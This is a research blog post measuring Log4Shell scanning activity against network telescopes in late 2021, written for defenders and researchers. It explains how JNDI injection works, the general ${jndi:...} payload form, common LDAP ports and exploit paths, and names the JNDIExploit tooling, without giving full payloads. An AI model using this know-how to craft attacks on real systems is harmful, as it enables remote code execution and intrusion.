The omnipresence of software introduces a constant threat of new vulnerabilities that affect widely-deployed implementations. At the end of 2021, the Log4Shell vulnerability (CVE-2021-44228) made headlines. It enables remote code execution through vulnerable applications by injecting a prepared string into the omnipresent Log4j library. Log4Shell was publicly disclosed on 10 December 2021 by Apache alongside a fix in the Log4j library version 2.15.0.
How it works
Log4j supports the runtime evaluation of specifically formatted messages. These messages cannot only be used to add additional information, such as the Java version, but allow queries through JNDI, the Java Naming and Directory Interface. Attackers can deploy one of the services supported by JNDI and trick the victim application into downloading specifically prepared Java objects from it. These objects then run small snippets of code to download and run malware, thus enabling remote code execution — provided an attacker can get the victim application to log the prepared message with Log4j.
Scanners
We observe scan attempts targeting TCP in the months of December 2021 and January 2022. Our vantage points deploy Spoki, a reactive telescope that establishes TCP connections and collects payloads. Our vantage points are four /24 IPv4 prefixes, one in the US and three in the EU.
We classify events, that is, packets with a Log4j format string, into malicious, benign, and unknown categories, based on their source IP using GreyNoise. Figure 1 gives an overview of the scan activity observed at the US VP and EU VP 1. The upper graphs show a time series for each category while the heat maps below visualize malicious intensity, calculated from the share of malicious events among all events per hour.
The first scans start on the evening of 9 December (23:00, UTC) at the US vantage point. The EU observed the first packets nearly a day later (15:00 UTC, 10 Dec). Noticeably, the only benign events are registered in the first week after the disclosure. After a period of high activity in December, the events per day dropped to around 100 in the EU, and 2,000 or less in the US.
Two peaks in the US, one malicious and one unknown source, stand out. They are caused by two IP addresses from the same Autonomous System (AS) in Russia. Both scanners methodically try different payloads and together produce about 60% of the packets in the US.
The heat maps reveal a period of mixed activity before malicious sources take over. While the benign actors start scanning before traffic peaks, they quickly lose interest. Here, researchers and threat intelligence providers have room to perform continuous measurements and observe the changing landscape.
Common tooling among attackers
The key to the exploit is tricking the victim application into logging the prepared string with Log4j. These strings have the form ${scheme:request}. For the Log4Shell exploit the scheme is set to ‘jndi’ while the request is a URL: scheme://host:port/path. Among the URLs we collected, several characteristics are frequently used by attackers.
First, most attacks work via the LDAP service. Figure 2 shows the event count for each scheme we observed, on a logarithmic y-axis. The EU vantage points see LDAP almost exclusively. RMI occurs a handful of times at both vantage points. While attacks over RMI received attention in the media, we only observed a few RMI requests. Three among them (US) match the URL mentioned in the article. These attacks may have been focused and did not hit our VPs in bulk. The DNS and HTTP events originate from the benign actors shown in Figure 1.
Second, the most popular port for LDAP servers is the non-default port 1389. It is used in 93% to 96% of all LDAP events. Other ports only make up between 1% and 2%, respectively.
Finally, the URL paths show large overlaps. Except for a single path, observed paths do not conform to the LDAP RFC (RFC 4516) as they do not include a valid distinguished name.
Two paths stand out: /Exploit, which makes up the largest share at all vantage points with 70% to 80% in the EU and 20% in the US, and paths that share the segments Command/Base64 followed by a base64-encoded segment. This group takes the second-largest share. These paths begin in a variety of ways, potentially hinting at their purposes, such as TomcatBypass or GroovyBypass. Decoding the base64 segment reveals script code that downloads an executable via HTTP to run locally.
Open source projects on GitHub connect the dots between LDAP, port 1389, and the base64 segments. An LDAP server — aptly named JNDIExploit — uses this port as its default port and supports a range of similarly composed URLs. For a given URL it decodes the base64-encoded segment and dynamically builds a Java object that runs the code when loaded by JNDI. It allows attackers to reuse a simple LDAP server for different attacks by adjusting the payload they send during scanning. Although the original project is no longer available, forks exist. The projects are older than the recent Log4Shell vulnerability, just like the exploit for JNDI, which was presented at BlackHat (PDF) in 2016.
Takeaways
Log4Shell is a critical vulnerability that affects a wide range of applications with different attack vectors. Our observation of scanning reveals a quick increase in malicious events that show continued interest, although at a reduced volume. Benign scanners quickly started looking for vulnerable hosts, but ceased scanning after a few days. We cannot measure the success rate of attackers but observing scanning behaviour can be an expressive indicator of the liveliness of the scene. A quick decrease in scanning activity may be a sign that vulnerable services are thinning out.
Common characteristics among payloads hint at common tools, such as the open source JNDIExploit project. The availability of tooling lowers the difficulty to set up an attack and run it. This could be a reason for the quick uptake in attack volume.
On a positive note, the vulnerability saw wide coverage online as blog posts were published, lists of vulnerable applications were collected, and detection tools were quickly made available. At the same time, official organizations published reports and issued warnings.
The underlying problem of Log4Shell is input sanitization — a common challenge that has plagued the industry in the form of SQL injections for years. User-supplied input must be treated with caution.
For more information read our paper “The Race to the Vulnerable: Measuring the Log4j Shell Incident”, which was presented at the Network Traffic Measurement and Analysis Conference (TMA), in June 2022.
Raphael Hiesgen is a PhD student at HAW Hamburg. His research focuses on Internet measurements and security, often using network telescopes for this purpose. This work wouldn’t have been possible without his co-authors: Marcin Nawrocki (FU Berlin), Thomas C. Schmidt (HAW Hamburg), and Matthias Wählisch (FU Berlin).
The views expressed by the authors of this blog are their own and do not necessarily reflect the views of APNIC. Please note a Code of Conduct applies to this blog.